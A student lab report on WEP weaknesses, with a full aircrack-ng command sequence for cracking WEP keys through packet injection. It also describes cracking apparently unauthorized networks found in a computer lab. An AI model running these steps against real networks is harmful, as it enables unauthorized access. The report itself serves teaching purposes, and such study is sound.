无线网络安全实验.

1、实 验 报 告课程名称 信息系统安全技术及应用 实验项目 无线网络安全性研究与实践实验仪器 PC机、因特网 系 别 信息管理学院 专 业 信息安全 班 级_ 组长姓名 _ 组员姓名_ _ _ _ _实验日期 2013- 成 绩 _指导教师 刘晓梅 北京信息科技大学信息管理学院（课程上机）实验报告实验名称无线网络安全性研究与实践实验地点信息安全实验室实验时间2013-10-91. 实验原理：数据通过空中电波进行传输时，利用从网上下载的一个程序，很容易就能捕捉到这些数据。这类监视是事先考虑的，所以802.11标准增加了WEP安全。使用WEP，所有数据都被打乱成无法识别的形式。虽然WEP无法阻止恶意

2、的程序拦截，但它确实能阻止普通人员轻松地读取捕捉到的数据。Wep使用RC4算法来加密数据。这是最流行的加密方式之一，并且在许多应用程序中得到了采用，其中包括大多数网上商店所集成的SSL(安全套接字)。RC4使用一个流式加密系统(Streaming Cipher)，它能为加密的每个数据包分别创建一个不重复的密钥（称为”包密钥”，即 packet key）。为此，它需要合并一个预共享密码的各个字符、一个状态值以及一个IV（初始向量)值来打乱数据。RC4的这部分称为密钥调度算法(KSA)。随即，结果数组成为一个”伪随机生成算法”(PRGA)的种子，后者生成一个密钥流，并与明文进行XOR运算，从而获得

3、密文。IV+密码（64位或128位）加密的数据KSAPRGA数据+CRC-32XOR密码IV(24位)实际发送的数据并非只由原始消息构成。它还包括一个称为“校验和”(CRC)的值，一个32位的值。校验和是根据数据包中的数据计算出来的一个不重复的值。校验和用于确保数据在传输过程中的完整性。收到并解密了数据包后，会重新计算校验和，并与原始校验和进行比较。两者相符，就接受数据包，否则就丢弃数据包。数据CRC-32算法数据CRC值数据+CRC值加密好数据后，IV会附加到数据上，同时用一个数据位(比特)来表示数据包已被加密。然后，所有信息广播到空中，由接受方捕捉和解密。解密过程是对加密过程的一个逆转。首

4、先，从数据包中移除IV，并将其与共享密钥合并在一起。然后，合并后的值用于重新创建KSA，后者进而用于创建密钥流(Keystream)，密钥流与加密的数据包进行XOR运算，便得到明文输出。然后，从明文中移除校验和(CRC)，并将它与重新计算后所得的CRC进行比较，随后确定对这个数据包的取舍。IV+密文密文数据+CRC-32密码IV坏数据数据CRC-32好数据XORCRC-32CRC比较KSAPRGA但是，RC4的实现是有缺陷的。特别是，如果我们知道了数据加密前的样子，那么对捕捉到的密文和已知的明文进行XOR运算，就能生成密钥流(Keystream)。出现这个缺陷的原因是，WEP是通过合并两个变量

5、，并对这两个变量进行XOR运算来得出密文的。下面一个公式1描述RC4算法的最后一个函数，它负责对数据进行加密。Ciphertext (密文) = Plaintext (明文) XOR Keystream(密钥流)WEP使用一个名为初始向量的值，这个值简称为IV（Initalization Vector）。RC4算法使用这个值与预共享密钥合并，从而为每个数据包创建自己的密钥流，从而通过WLAN发送的每个数据包都创建一个新的、不重复的”数据包密钥”。WEP为通过WLAN传送的每个数据包都使用一个3字节的IV。数据发送后，IV会添加在每个加密的数据包之前。这就能保证接收人获得解密数据所需的全部信息。

6、不过，有个潜在的问题。一个字节由8个比特组成，因此，IV的总长度为24比特（8比特/字节*3字节）。如果计算所有可能的IV，那么结果是224 = 16777266个可能的密钥。虽然看起来很大，但它与通信联系起来时，实际是非常小的，原因是可能会重复。IV是一个随机数。当大多数人将“随机”和16777216这样一个数字联系到一起时，第一个反应是，黑客平均必须等待1600万个数据包后，才能收到重复的包。但这种想法是错误的。事实上，考虑到随机性的本质，只需传输5000个包，就会开始重复，这就是我们所说的“冲突”。从而IV的“冲突”，造成了WLAN WEP加密被破解的致命弱点。2. 实验准备（实验环境的

7、搭建、实验仪器的准备等）：本次实验主要涉及了2个实验环境：一：宿舍的实验环境：为了方便研究无线破解的技术和原理，从安协拿回了无线路由器，在宿舍搭建了一个由TP-LINK 54MB的无线路由组成的用WEB-64比特加密方式加密的无线局域网。二：机房的实验环境：机房的实验环境不需要自己搭建，有很多现成的无线信号可以供破解，也没有实验仪器需要准备。3. 实验步骤（详细写出实验步骤）：实验准备阶段：（1）实验装备用具：华硕A8JS（内置Intel3945 无线网卡）配备BT3 U盘操作系统。 IBM T60（内置Intel3945 无线网卡）配备BT3 硬盘操作系统。（2）调试各种BT3操作系统，使在

8、BT3下能够上网浏览网页，浏览文档，辅助在BT3下的破解工作，且可以正常运行进行破解工作。实验破解阶段：（1）在BT3操作系统下： 一种方法： 1.开机运行BT3操作系统，打开一个SHELL命令框，开始输入命令：modprobe r iwl3945卸载3945网卡的原驱动，再输入命令：modprobe ipwraw 装载支持监听模式的新驱动。 2.输入命令：airodump-ng wifi0 开始扫描所有的无线信号，以选择破解的目标。 3.输入命令：macchanger m <本机MAC地址> wifi0 来改变自己网卡的MAC地址，确保相同。 此步可有可无。故无截图，在此只是点名

9、此步骤。 4.输入命令：airmon-ng start wifi0 6 激活网卡的监听模式并且工作在wifi0所在的第6频 5.输入命令：airodump-ng -w capture -c 6 bssid <所要破解的AP的MAC地址> wifi0 开始按照物理地址和频道所对应的无线信号抓包，并且把所抓到的数据包存为名字capture的文件。 6.输入命令：aireplay-ng -1 0 -e <所要破解的AP的Essid> -a <所要破解的AP的物理地址> wifi0 利用BT3系统自带的-1攻击模式对所要破解的无线路由器进行虚连接攻击，伪造和所要破解

10、AP的伪装连接，为后面的攻击打下基础。 7.输入命令：aireplay-ng -3 b <所要破解的AP的物理地址> wifi0 利用BT3操作系统自带的arp 注入攻击模式的 -3 模式通过不断向AP 发送同样的arp请求包，来进行注入式攻击，以便获得大量的有效数据。攻击成功后数据包飞涨。 另一种方法： 1.开机运行BT3操作系统，打开一个SHELL命令框，开始输入命令：modprobe r iwl3945卸载3945网卡的原驱动，再输入命令：modprobe ipwraw 装载支持监听模式的新驱动。 2.输入命令：airodump-ng wifi0 开始扫描所有的无线信号，以选

11、择破解的目标。 3.输入命令：macchanger m <本机MAC地址> wifi0 来改变自己网卡的MAC地址，确保相同。此步可有可无。故无截图，在此只是点名此步骤。 4.输入命令：airmon-ng start wifi0 6 激活网卡的监听模式并且工作在wifi0所在的第6频道。 5.输入命令：airodump-ng -w capture -c 6 bssid <所要破解的AP的MAC地址> wifi0 开始按照物理地址和频道所对应的无线信号抓包，并且把所抓到的数据包存为名字是capture的文件。 6.输入命令：aireplay-ng -1 0 -e <

12、所要破解的AP的Essid> -a <所要破解的AP的物理地址> wifi0 利用BT3系统自带的-1攻击模式对所要破解的无线路由器进行虚连接攻击，伪造和所要破解AP的伪装连接，为后面的攻击打下基础。 7.输入命令：airreplay-ng -5 b 001478e51610 wifi0采用碎片包攻击模式-5，获得一个PRGA数据包（xor文件）。 8.输入命令：packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 l 255.255.255.255 y fragment-0108-2

13、31739.xor -w myarp 用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。9.输入命令：aireplay-ng -2 r myarp -x 512 wifi0采用交互模式-2，发包注入攻击。 总后一步：破解密钥 输入：aircrack-ng -n 64 -b <ap mac> packet-02.ivs 从上面两种方法主要是获得足够的数据包，数据包里包含足够的IV，从而进行破解。 可以看到密码为：”qazxc”（2）在Windows操作系统下： 1.安装3款软件，分别是netstumblerinstaller、WinAi

14、rcrackPack、omnipeek。Netstumbler是一款用于在Windows系统下检测无线信号各项参数的应用软件，WinAircrackPack是对所抓到WEB数据包进行破解的软件，omnipeek是在Windows操作系统下用于抓包的软件。 2. 3款然见安装成功后分别打开3款软件进行试用调试，无错的情况下进入下一步 3打开netstumbler查看能检测到的无线信号，观察它的强度、无线加密方式，是否适合作为破解目标，最后选定破解目标。 4. 选定破解目标后进行运行omnipeek对所选目标开始进行抓包工作，在Windows操作系统下破解需要大量的数据包而且由于破解的是局域网所以

15、没有有效数据开始，最后依靠局域网内的人为的数据传送才抓到了大量的有效数据包。 5. 打开WinAircrackPack对所抓到的数据包进行破解，因为数据量较大而且属于暴力破解方式所以等的时间比较长，最后破解成功。 注：因为在Windows操作系统下的破解工作是最开始研究的方向，后来一直没有再研究，所以此次实验并未截图，因为破解一次耗时很久也没有重新再做，特此说明。4. 实验问题及解决方案：问题1：最开始使用的VMware虚拟机找不到网卡。 在网上搜索相关问题后了解到Vmware 不支持笔记本内置的mini pci 接口的网卡，而使用VM 建议配置USB 无线网卡。Mini PCI 笔记本网卡建

16、议使用CD 版、硬盘和U 盘启动BT3。问题2：实验过程中输入一些命令例如ifconfig a 、bssid 等命令时提示错误。通过HELP方法查看命令语法发现是因为少输了空格和应该为-bssid仔细核对命令后改正。问题3：在机房破解无线信号的时候建立虚连接不成功。 在从网上查阅相关资料和根据以往破解经验的总结后得出所破解网络的AP信号必须达到一定强度而且距离不能太远，还有就是用用户的时候比没有用户成功的概率要大的多。问题4：抓到足够的数据包后却无法顺利利用命令进行破解。 经过多次的尝试和分析最后发现是因为无线路由器的加密方式是128bit的WEB加密方式，而不是64位的加密方式，改过来后顺利

17、破解。问题5：无法破解无客户端连接的WEP密码。 如果一直是无客户端的AP经过我们的研究由于没有任何数据产生，也就没有数据包可以捕获更没有数据包能够不断重发，产生的一些数据由于没有IV初始化向量导致对破解没有帮助，所以没有客户端连接的Ap是无法破解的。问题6：路由器登陆不成功 由于有人在别人不知道的情况下将路由器重置了。重新设置后恢复。问题7：BT3操作系统在运行过程中经常死机。 通过网络资料的查阅和与同学的讨论加上对该问题的反复研究尝试，最后得出的结论是USB版本的BT3操作系统本身的稳定性和性能就不如硬盘版的BT3操作系统，系统运行繁忙的时候就极其容易死机尤其是抓包破解过程中。还有就是开始

18、使用的bt3并不是从官方网站上下载的BT3 final 版本的，而是老版本所以问题更多一些，后来更新了BT3操作系统，问题得到了较大改善。5. 实验结果分析：通过屡次在不同的环境、不同的系统破解不一样的无线信号所得到的结果来看，有以下几点分析，首先在Windows操作系统下的破解要比BT3操作系统下破解费事的多并且会消耗大量的时间，要抓的数据包量很大，所以破解无线不建议在Windows操作系统下进行，BT3操作系统下的破解也不是都相同的，我们主要用了-3注入攻击和-5碎片攻击两种攻击方式，同时也尝试了其他的攻击方法但是感觉这两种攻击方法最好最有效，且其他方式的攻击和它们的步骤也都差不多，原理也相似，-3攻击模式的特点是速度快，但是要求虚连接要顺利建立。-5攻击模式的步骤虽然比-3要多一点，但是-5攻击模式可以适应比-3复杂的网络环境，成功率更高。从截获的数据包量来看，一般数据包截获到2000030000就可以顺利破解了，当然不排除有偶然的情